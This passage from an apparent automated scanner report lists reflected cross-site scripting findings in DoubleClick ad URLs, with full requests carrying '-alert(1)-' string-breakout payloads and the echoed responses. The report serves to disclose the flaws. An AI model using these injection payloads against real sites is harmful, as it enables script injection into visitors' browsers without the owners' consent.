://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236f0165'-alert(1)-'634ccbdbc03&m=1&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.102. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97bd1'-alert(1)-'cb3c0dc5ffc was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=5439397bd1'-alert(1)-'cb3c0dc5ffc&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:23 GMT
Expires: Sat, 29 Jan 2011 05:20:23 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=5439397bd1'-alert(1)-'cb3c0dc5ffc&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.103. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a2e1"-alert(1)-"448534e683b was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=543933a2e1"-alert(1)-"448534e683b&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:22 GMT
Expires: Sat, 29 Jan 2011 05:20:22 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=543933a2e1"-alert(1)-"448534e683b&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false
...[SNIP]...

4.104. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 373ba'-alert(1)-'f120bbbe02 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903373ba'-alert(1)-'f120bbbe02&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5990
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:15 GMT
Expires: Sat, 29 Jan 2011 05:20:15 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
href=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7d/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903373ba'-alert(1)-'f120bbbe02&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.105. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a04f3"-alert(1)-"51bafdadbda was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903a04f3"-alert(1)-"51bafdadbda&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:15 GMT
Expires: Sat, 29 Jan 2011 05:20:15 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
scape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903a04f3"-alert(1)-"51bafdadbda&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fs
...[SNIP]...

4.106. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [tp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a25ce'-alert(1)-'cddf5d2d430 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5a25ce'-alert(1)-'cddf5d2d430&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:27 GMT
Expires: Sat, 29 Jan 2011 05:20:27 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5a25ce'-alert(1)-'cddf5d2d430&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.107. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [tp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac0ff"-alert(1)-"7e478181650 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5ac0ff"-alert(1)-"7e478181650&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:26 GMT
Expires: Sat, 29 Jan 2011 05:20:26 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5ac0ff"-alert(1)-"7e478181650&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

4.108. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B4898428.3

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3ab0'-alert(1)-'b3d4566e284 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0d3ab0'-alert(1)-'b3d4566e284&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:20 GMT
Expires: Sat, 29 Jan 2011 05:20:20 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0d3ab0'-alert(1)-'b3d4566e284&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\">
...[SNIP]...

4.109. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B4898428.3

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4f66"-alert(1)-"c200b6efce1 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0c4f66"-alert(1)-"c200b6efce1&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:19 GMT
Expires: Sat, 29 Jan 2011 05:20:19 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0c4f66"-alert(1)-"c200b6efce1&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow =
...[SNIP]...

4.110. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [forced_click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B4898428.3

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d52e'-alert(1)-'5e41e6817f1 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=4d52e'-alert(1)-'5e41e6817f1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5797
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:23 GMT
Expires: Sat, 29 Jan 2011 05:20:23 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=4d52e'-alert(1)-'5e41e6817f1http://www.dawnrecetas.com\">
...[SNIP]...

4.111. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [forced_click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B4898428.3

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe2fe"-alert(1)-"e1eaa27e27d was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=fe2fe"-alert(1)-"e1eaa27e27d HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5797
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:22 GMT
Expires: Sat, 29 Jan 2011 05:20:22 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=54393&c=0&tp=8&forced_click=fe2fe"-alert(1)-"e1eaa27e27dhttp://www.dawnrecetas.com");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;

...[SNIP]...

4.112. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B4898428.3

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bd16'-alert(1)-'d5fd3def361 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=61bd16'-alert(1)-'d5fd3def361&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:15 GMT
Expires: Sat, 29 Jan 2011 05:20:15 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=61bd16'-alert(1)-'d5fd3def361&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\">
...[SNIP]...

4.113. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B4898428.3

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9c29"-alert(1)-"d32825b59b7 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6a9c29"-alert(1)-"d32825b59b7&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:14 GMT
Expires: Sat, 29 Jan 2011 05:20:14 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6a9c29"-alert(1)-"d32825b59b7&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

4.114. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [mid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B4898428.3

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b27c"-alert(1)-"b0efc15adcb was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=5215548b27c"-alert(1)-"b0efc15adcb&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:13 GMT
Expires: Sat, 29 Jan 2011 05:20:13 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3a9e/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=5215548b27c"-alert(1)-"b0efc15adcb&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

...[SNIP]...

4.115. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [mid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B4898428.3

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4f97'-alert(1)-'3c450e58e7b was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554c4f97'-alert(1)-'3c450e58e7b&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:13 GMT
Expires: Sat, 29 Jan 2011 05:20:13 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3a9e/f/7e/%2a/k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554c4f97'-alert(1)-'3c450e58e7b&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\">
...[SNIP]...

4.116. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B4898428.3

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72347'-alert(1)-'4c8f0ab3a92 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=5439372347'-alert(1)-'4c8f0ab3a92&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:17 GMT
Expires: Sat, 29 Jan 2011 05:20:17 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k%3B231657005%3B0-0%3B0%3B59338211%3B4307-300/250%3B39039808/39057565/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=5439372347'-alert(1)-'4c8f0ab3a92&c=0&tp=8&forced_click=http%3a%2f%2fwww.dawnrecetas.com\">
...[SNIP]...

4.117. http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N763.Valueclick/B4898428.3

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73b99"-alert(1)-"22b3257a069 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N763.Valueclick/B4898428.3;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=279602&mid=521554&m=6&sid=5439373b99"-alert(1)-"22b3257a069&c=0&tp=8&forced_click=;ord=20110128225610?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5815
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:16 GMT
Expires: Sat, 29 Jan 2011 05:20:16 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
